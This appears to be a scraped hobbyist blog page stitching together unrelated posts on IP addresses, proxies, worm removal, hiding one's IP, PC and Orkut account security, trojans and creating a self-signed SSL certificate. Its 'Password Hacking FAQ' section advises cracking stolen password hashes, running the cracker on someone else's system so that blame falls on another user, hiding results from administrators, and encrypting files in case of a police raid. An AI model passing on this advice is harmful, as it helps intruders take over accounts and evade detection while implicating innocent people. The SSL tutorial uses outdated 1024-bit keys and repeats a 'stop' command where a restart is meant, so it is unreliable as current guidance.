An IP address (Internet Protocol address) is a unique address that certain electronic devices currently use in order to identify and communicate with each other on a computer network utilizing the Internet Protocol standard (IP)—in simpler terms, a computer address. Any participating network device—including routers, switches, computers, infrastructure servers (e.g., NTP, DNS, DHCP, SNMP, etc.), printers, Internet fax machines, and some telephones—can have its own address that is unique within the scope of the specific network. Some IP addresses are intended to be unique within the scope of the global Internet, while others need to be unique only within the scope of an enterprise.

The IP address acts as a locator for one IP device to find another and interact with it. It is not intended, however, to act as an identifier that always uniquely identifies a particular device. In current practice, an IP address is less likely to be an identifier, due to technologies such as Dynamic assignment and Network address translation.

Web Proxies

In computer networks, a proxy server is a server (a computer system or an application program) which services the requests of its clients by forwarding requests to other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server provides the resource by connecting to the specified server and requesting the service on behalf of the client. A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server. In this case, it would ‘cache’ the first request to the remote server, so it could save the information for later, and make everything as fast as possible.

A proxy server that passes all requests and replies unmodified is usually called a gateway or sometimes tunneling proxy.

A proxy server can be placed in the user’s local computer or at specific key points between the user and the destination servers or the Internet.

Caching proxy server

A proxy server can service requests without contacting the specified server, by retrieving content saved from a previous request, made by the same client or even other clients. This is called caching. Caching proxies keep local copies of frequently requested resources, allowing large organizations and Internet Service Providers to significantly reduce their upstream bandwidth usage and cost, while significantly increasing performance. There are well-defined rules for caching. Some poorly-implemented caching proxies have had downsides (e.g., an inability to use user authentication). Some problems are described in RFC 3143 (Known HTTP Proxy/Caching Problems).

Web proxy

Proxies that focus on WWW traffic are called web proxies. Many web proxies attempt to block offensive web content. Other web proxies reformat web pages for a specific purpose or audience (e.g., cell phones and PDAs)

Access control: Some proxy servers implement a logon requirement. In large organizations, authorized users must log on to gain access to the ‘WWW.’ . The organization can thereby track usage to individuals.

Anonymizing proxy server

A proxy server that removes identifying information from the client’s requests for the purpose of anonymity is called an anonymizing proxy server or anonymizer.

Transparent and non-transparent proxy server

The term “transparent proxy” is most often used incorrectly to mean “intercepting proxy” (because the client does not need to configure a proxy and cannot directly detect that its requests are being proxied).

However, RFC 2616 (Hypertext Transfer Protocol — HTTP/1.1) offers different definitions:

“A ‘transparent proxy’ is a proxy that does not modify the request or response beyond what is required for proxy authentication and identification.

“A ‘non-transparent proxy’ is a proxy that modifies the request or response in order to provide some added service to the user agent, such as group annotation services, media type transformation, protocol reduction, or anonymity filtering.”

Friday, April 16, 2010

How to Remove Newfolder.EXE/Sohanad Virus

You can remove this worm by manual method, or using a removal tool.

1.Manual Method

Here are simple steps following which you can get the worm removed from your system:

1.Download this file:Registry_Repair.

2.Double click on that downloaded registry file, you will be asked weather you’re sure to add this to registry, click yes.

3.Restart your system.

4.Search for the file svhost32.exe and delete it if its found.

5.Search for the file svhost.exe and delete it if its found.

Password Hacking FAQ

1. What are some password basics?

Most accounts on a computer system usually have some method of restricting access to that account, usually in the form of a password. When accessing the system, the user has to present a valid ID to use the system, followed by a password to use the account. Most systems either do not echo the password back on the screen as it is typed, or they print an asterisk in place of the real character.

On most systems,the password is typically ran through some type of algorithm to generate a hash. The hash is usually more than just a scrambled version of the original text that made up the password, it is usually a one-way hash. The one-way hash is a string of characters that cannot be reversed into its original text. You see, most systems do not “decrypt” the stored password during authentication, they store the one-way hash. During the login process, you supply an account and password. The password is ran through an algorithm that generates a one-way hash. This hash is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied.

Cryptographically speaking, some algorithms are better than others at generating a one-way hash. The main operating systems we are covering here — NT, Netware, and Unix — all use an algorithm that has been made publically available and has been scrutinized to some degree.

To crack a password requires getting a copy of the one-way hash stored on the server, and then using the algorithm generate your own hash until you get a match. When you get a match, whatever word you used to generate your hash will allow you to log into that system. Since this can be rather time-consuming, automation is typically used. There are freeware password crackers available for NT, Netware, and Unix.

2. Why protect the hashes?

If the one-way hashes are not the password itself but a mathematical derivative, why should they be protected? Well, since the algorithm is already known, a password cracker could be used to simply encrypt the possible passwords and compare the one-way hashes until you get a match. There are two types of approaches to this — dictionary and brute force.

Usually the hashes are stored in a part of the system that has extra security to limit access from potential crackers.

3. What is a dictionary password cracker?

A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password.

Some of these dictionary crackers can “manipulate” each word in the wordlist by using filters. These rules/filters allow you to change “idiot” to “1d10t” and other advanced variations to get the most from a word list. The best known of these mutation filters are the rules that come with Crack (for Unix). These filtering rules are so popular they have been ported over to cracking software for NT.

If your dictionary cracker does not have manipulation rules, you can “pre-treat” the wordlist. There are plenty of wordlist manipulation tools that allow all kinds of ways to filter, expand, and alter wordlists. With a little careful planning, you can turn a small collection of wordlists into a very large and thorough list for dictionary crackers without those fancy word manipulations built in.

4. What is a brute force password cracker?

A brute force cracker simply tries all possible passwords until it gets the password. From a cracker perspective, this is usually very time consuming. However, given enough time and CPU power, the password eventually gets cracked.

Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.

5. Which method is best for cracking?

It really depends on your goal, the cracking software you have, and the operating system you are trying to crack. Let’s go through several scenarios.

If you remotely retrieved the password file through some system bug, your goal may be to simply get logged into that system. With the password file, you now have the user accounts and the hashes. A dictionary attack seems like the quickest method, as you may simply want access to the box. This is typical if you have a method of leveraging basic access to gain god status.

If you already have basic access and used this access to get the password file, maybe you have a particular account you wish to crack. While a couple of swipes with a dictionary cracker might help, brute force may be the way to go.

If your cracking software does both dictionary and brute force, and both are quite slow, you may just wish to kick off a brute force attack and then go about your day. By all means, we recommend a dictionary attack with a pre-treated wordlist first, followed up by brute force only on the accounts you really want the password to.

You should pre-treat your wordlists if the machine you are going to be cracking from bottlenecks more at the CPU than at the disk controller. For example, some slower computers with extremely fast drives make good candidates for large pre-treated wordlists, but if you have the CPU cycles to spare you might want to let the cracking program’s manipulation filters do their thing.

A lot of serious hackers have a large wordlist in both regular and pre-treated form to accommodate either need.

6. What is a salt?

To increase the overhead in cracking passwords, some algorithms employ salts to add further complexity and difficulty to the cracking of passwords. These salts are typically 2 to 8 bytes in length, and algorithmically introduced to further obfuscate the one-way hash. Of the major operating systems covered here, only NT does not use a salt. The specifics for salts for both Unix and Netware systems are covered in their individual password sections.

Historically, the way cracking has been done is to take a potential password, encrypt it and produce the hash, and then compare the result to each account in the password file. By adding a salt, you force the cracker to have to read the salt in and encrypt the potential password with each salt present in the password file. This increases the amount of time to break all of the passwords, although it is certainly no guarantee that the passwords can’t be cracked. Because of this most modern password crackers when dealing with salts do give the option of checking a specific account.

7. What are the dangers of cracking passwords?

The dangers are quite simple, and quite real. If you are caught with a password file you do not have legitimate access to, you are technically in possession of stolen property in the eyes of the law. For this reason, some hackers like to run the cracking on someone else’s systems, thereby limiting their liability. I would only recommend doing this on a system you have a legitimate or well-established account on if you wish to keep a good eye on things, but perhaps have a way of running the cracking software under a different account than your own. This way, if the cracking is discovered (as it often is — cracking is fairly CPU-intensive), it looks to belong to someone else. Obviously, you would want to run this under system adminstrator priviledges as you may have a bit more control, such as assigning lower priority to the cracking software, and hiding the results (making it less obvious to the real administrator).

Being on a system you have legit access to also allows you better access to check on the progress. Of course, if it is known you are a hacker, you’ll still be the first to be blamed whether the cracking software is yours or not!

Running the cracking software in the privacy of your own home has the advantage of allowing you to throw any and all computing power you have at your disposal at a password, but if caught (say you get raided) then there is little doubt whose cracking job is running. However, there are a couple of things you can do to protect yourself: encrypt your files. Only decrypt them when you are viewing them, and wipe and/or encrypt them back after you are done viewing them.

8. Is there any way I can open a password-protected Microsoft Office document?

Certainly! There are plenty of commercial programs that will do this, but we give props to Elcomsoft for fighting the DMCA. 30-day trial versions are available here

Hide IP Address – Real ways to hide your IP

Here in this post I will try to give you every possible information to hide the IP address.If you seriously want to hide your IP address then this post is for you!

One of the most frequently asked questions by the internet users is How To Hide IP Address ?. Many times it becomes necessary to hide the real IP address for the sake of privacy.For this, I have tried many softwares, proxy servers and many such tools that guaranteed to hide my IP address.But still none of them worked for me. I think most of you have the same experience.Are you fed up with these dummy softwares that fails to hide the real IP address? Then is there any working way to hide the IP address?

YES, you can definitely hide your IP .

Now I’ll come to the heart of the post, which contains the answer to your curious question How to Hide the IP address ? The only solution to hide your IP address is by using a Proxy Server.But Wait! The story doesn’t end here.Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server.Before setting up the connection with the proxy servers you must know some information about different types of proxy servers and their uses.

1. Transparent Proxy Server

This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speedup the web browsing since thay have a very good ability to cache websites.But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the web.This type of proxy server does not hide your IP address.

2. Anonymous Proxy Server

This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

3. Distorting Proxy Server

This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.

4. High Anonymity Proxy Server ( Elite Proxy)

This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.So this is the best way to mask your IP.

Which Proxy Server is the best to Hide My IP ?

I know, you can answer this question better than me.Obviously High Anonymity Proxy or Elite Proxy is the best to hide your IP.But it’s not easy to get a list of working elite proxies.If you search the Google, you will definitely get tons of proxy list.You’ll get a list of proxies in the following format

IP:Port Number

Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)

But most of them don’t work.Here are some of the problems/risks associated with using free proxies that are available on the internet.

■Most of them do not work since the proxy servers frequently changes it’s IP/Port number.

■Even if you find a working proxy server it may be too slow.

■Your privacy is not guaranteed since all your traffic is routed through the proxy server.

■The administrators of the proxy servers may steal your valuable information such as passwords,SSN (Social security number),Credit Card details etc.

So with all these being the risks then how to find a Working,fast,Highly Anonymous and secured Proxy servers?

Now I will give a list of softwares that will really hide your IP address.I have tried many such softwares and have found only few of them working perfectly.Here is a list of working IP Hiding softwares that you can try.I have listed them in the order of their popularity

1. Hide The IP

Let’s you choose the country,Type and speed of the proxy.Not so popular but personally I recommend this to the users.

2. Hide My IP

3. Hide IP NG

You can get more informations about these products on their respective homepages.

How to ensure that the IP is hidden ?

Before you hide your IP you can check your real IP by visiting the following site.

WhatIsMyIPAddress.Com

Once you get your real IP, switch on your IP hiding software.Now once again visit the above site and check your IP address.If you see a new IP then this means that your software is doing the right job.Also the above site(Whatismyipaddress.com) is capable of detecting many proxies.If you see the words such as “Suspected proxy server or network sharing device” or similar words then it means that the proxy you are using is not an Elite Proxy.

One Final Word before you leave! Even though Elite proxies are almost undetectable this doesn’t mean that you can escape from online crimes by hiding your IP.There are many proxy detecting services available which detect almost any proxy.So if you involve in any cyber crimes then you will definitely be behind the bars.Using proxy will not help you in this case.

One More thing, It is unsafe to use proxy during e-commerce transactions such as Online banking,Online Credit Card payment etc.So please avoid proxies during these circumstances.

10 Tips to Enhance your PC Security

Today almost everyone of us have a PC with an internet connection but how many of us think about it’s security? In fact most of the people are least bothered about their PC’s security.Especially if you have an internet connection safeguarding your PC against network threats is a must.If your PC is not secured then it might be vulnerable to various threats.The threat may be as simple as a virus which corrupts your data or as complex as an identity theft where there are chances of huge loss of money.Did you know that unsecured PCs can be hijacked in minutes ? If you are really concerned about PC security then here are the top 10 security enhancements for your PC.

1. Check Windows Update.Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a good Antivirus software and update it regularly.An Antivirus without updates is of no use.

3. Install a personal firewall. Both SyGate (http://www.sygate.com//) and ZoneAlarm (http://www.zonelabs.com//) offer free versions.

4. Install a good Antispyware.(Antivirus with built-in antispyware is a go0d choice)

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro#l. This will make it much harder for anyone to gain access to your accounts.

6. If you’re using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Be skeptical of things on the Internet. Don’t blindly assume that an email “From:” a particular person is actually from that person since it is possible to send a fake email.

8. Check for Versign SSL (Secure Sockets Layer) Certificate (Or logo) before you make any ecommerce transaction (Credit card transaction) with a website.

9. Never disable the Auto-Protect feature of your Antivirus.If your Antivirus doesn’t have Auto-Protect feature then manually scan the files before you execute them.

10. Never give out your passwords to anyone at any time even if the person claims to be from “support.”

Free Tools for Spyware Removal

There are lot of PC users who know only little about “Spyware”, “Malware”, “hijackers”, “Dialers” & many more. This article will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?

Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user’s interaction with the computer, without the user’s informed consent.The term spyware suggests software that secretly monitors the user’s behavior.Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.

How to check if a program has spyware?

It is this little site that keeps a database of programs that are known to install spyware.

Check Out: SpywareGuide

How To Block Pop-Ups?

If you would like to block pop-ups (IE Pop-ups) there are tons of different tools out there, but these are the two best, I think.

Try: Google Toolbar - This tool is a Freeware.

Try: AdMuncher – This tool is a Shareware.

How To Remove Spywares?

If you want to remove spwares then you may try the following tools/programs

Try: Lavasoft Ad-Aware - This tool is a freeware.

Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D – This tool is a freeware.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: Spy Sweeper - This tool is a shareware.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.The best scanner out there, and updated all the time.

Try: BPS Spyware and Adware Remover – This tool is a shareware.

Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you’d like to remove.

How To Prevent Spyware?

To prevent spyware attack you can try the following tools.

Try: SpywareBlaster - This tool is a freeware.

Info: SpywareBlaster doesn’t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: XP-AntiSpy - This tool is a freeware.

Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people

Hack Protect your Orkut Account

Most of the people ask me “How to hack an Orkut account” which I have already discussed in my previous post Hacking Orkut. But here I am giving you a detailed information about how to protect your Orkut accounts. As we all know most of the Google services are still in BETA. So,websites like Orkut, powered by Google is not totally secure!Several people feel proud in hacking other user’s account. You do a foolish thing, and next day your account is hacked. This is very sad indeed, but hackers are adding names to their victims list till now.

How can a hacker hack my Orkut account?

The answer to this question is already discussed in my previous post How to Hack Orkut.

But this post is meant for providing some safety measures to prevent your Orkut account from being hacked. There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.

1. Never try to login/access your Orkut account from sites other than Orkut.com.

2. Never click on any links from the sources you don’t trust while accessing your Orkut account. (or while accessing any other Google services like Gmail,Blogger etc.)

3. Delete any links on your scrapbook, no matter if a known or unknown person have sent it.

4. Never disclose your orkut login details with anyone.

5. Never ever use Javascripts on Orkut, no matter whatever it claims to do. Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.

6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a Phishing site.

7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.

8. Always remember to hit Sign out button, when you are done.

Know More About Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

■It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

■Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

■Attacker gets access to the trojaned system as the system goes online

■By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

■Remote Access Trojans

■Password Sending Trojans

■Keyloggers

■Destructive

■Denial Of Service (DoS) Attack Trojans

■Proxy/Wingate Trojans

■FTP Trojans

■Software Detection Killers

Modes of Transmission

■Attachments

■Physical Access

■Browser And E-mail Software Bugs

■NetBIOS (File Sharing)

■Fake Programs

■Un-trusted Sites And Freeware Software

Backdoor Countermeasures

■Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)

■An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.

■Educate your users not to install applications downloaded from the internet and e-mail attachments.

How to create a self-signed SSL Certificate ...

Overview

The following is an extremely simplified view of how SSL is implemented and what part the certificate plays in the entire process.

Normal web traffic is sent unencrypted over the Internet. That is, anyone with access to the right tools can snoop all of that traffic. Obviously, this can lead to problems, especially where security and privacy is necessary, such as in credit card data and bank transactions. The Secure Socket Layer is used to encrypt the data stream between the web server and the web client (the browser).

SSL makes use of what is known as asymmetric cryptography, commonly referred to as public key cryptography (PKI). With public key cryptography, two keys are created, one public, one private. Anything encrypted with either key can only be decrypted with its corresponding key. Thus if a message or data stream were encrypted with the server's private key, it can be decrypted only using its corresponding public key, ensuring that the data only could have come from the server.

If SSL utilizes public key cryptography to encrypt the data stream traveling over the Internet, why is a certificate necessary? The technical answer to that question is that a certificate is not really necessary - the data is secure and cannot easily be decrypted by a third party. However, certificates do serve a crucial role in the communication process. The certificate, signed by a trusted Certificate Authority (CA), ensures that the certificate holder is really who he claims to be. Without a trusted signed certificate, your data may be encrypted, however, the party you are communicating with may not be whom you think. Without certificates, impersonation attacks would be much more common.

Step 1: Generate a Private Key

The openssl toolkit is used to generate an RSA Private Key and CSR (Certificate Signing Request). It can also be used to generate self-signed certificates which can be used for testing purposes or internal usage.

The first step is to create your RSA Private Key. This key is a 1024 bit RSA key which is encrypted using Triple-DES and stored in a PEM format so that it is readable as ASCII text.

openssl genrsa -des3 -out server.key 1024

Generating RSA private key, 1024 bit long modulus

.........................................................++++++

........++++++

e is 65537 (0x10001)

Enter PEM pass phrase:

Verifying password - Enter PEM pass phrase:

Step 2: Generate a CSR (Certificate Signing Request)

Once the private key is generated a Certificate Signing Request can be generated. The CSR is then used in one of two ways. Ideally, the CSR will be sent to a Certificate Authority, such as Thawte or Verisign who will verify the identity of the requestor and issue a signed certificate. The second option is to self-sign the CSR, which will be demonstrated in the next section.

During the generation of the CSR, you will be prompted for several pieces of information. These are the X.509 attributes of the certificate. One of the prompts will be for "Common Name (e.g., YOUR name)". It is important that this field be filled in with the fully qualified domain name of the server to be protected by SSL. If the website to be protected will be https://public.akadia.com, then enter public.akadia.com at this prompt. The command to generate the CSR is as follows:

openssl req -new -key server.key -out server.csr

Country Name (2 letter code) [GB]:CH

State or Province Name (full name) [Berkshire]:Bern

Locality Name (eg, city) [Newbury]:Oberdiessbach

Organization Name (eg, company) [My Company Ltd]:Akadia AG

Organizational Unit Name (eg, section) []:Information Technology

Common Name (eg, your name or your server's hostname) []:public.akadia.com

Email Address []:martin dot zahn at akadia dot ch

Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:

Step 3: Remove Passphrase from Key

One unfortunate side-effect of the pass-phrased private key is that Apache will ask for the pass-phrase each time the web server is started. Obviously this is not necessarily convenient as someone will not always be around to type in the pass-phrase, such as after a reboot or crash. mod_ssl includes the ability to use an external program in place of the built-in pass-phrase dialog, however, this is not necessarily the most secure option either. It is possible to remove the Triple-DES encryption from the key, thereby no longer needing to type in a pass-phrase. If the private key is no longer encrypted, it is critical that this file only be readable by the root user! If your system is ever compromised and a third party obtains your unencrypted private key, the corresponding certificate will need to be revoked. With that being said, use the following command to remove the pass-phrase from the key:

cp server.key server.key.org

openssl rsa -in server.key.org -out server.key

The newly created server.key file has no more passphrase in it.

-rw-r--r-- 1 root root 745 Jun 29 12:19 server.csr

-rw-r--r-- 1 root root 891 Jun 29 13:22 server.key

-rw-r--r-- 1 root root 963 Jun 29 13:22 server.key.org

Step 4: Generating a Self-Signed Certificate

At this point you will need to generate a self-signed certificate because you either don't plan on having your certificate signed by a CA, or you wish to test your new SSL implementation while the CA is signing your certificate. This temporary certificate will generate an error in the client browser to the effect that the signing certificate authority is unknown and not trusted.

To generate a temporary certificate which is good for 365 days, issue the following command:

openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt

Signature ok

subject=/C=CH/ST=Bern/L=Oberdiessbach/O=Akadia AG/OU=Information

Technology/CN=public.akadia.com/Email=martin dot zahn at akadia dot ch

Getting Private key

Step 5: Installing the Private Key and Certificate

When Apache with mod_ssl is installed, it creates several directories in the Apache config directory. The location of this directory will differ depending on how Apache was compiled.

cp server.crt /usr/local/apache/conf/ssl.crt

cp server.key /usr/local/apache/conf/ssl.key

Step 6: Configuring SSL Enabled Virtual Hosts

SSLEngine on

SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt

SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key

SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

CustomLog logs/ssl_request_log \

"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

Step 7: Restart Apache and Test

/etc/init.d/httpd stop

/etc/init.d/httpd stop

https://public.akadia.com

source

http://akadia.com

NETRDX BLOG : Just Anthing To Everything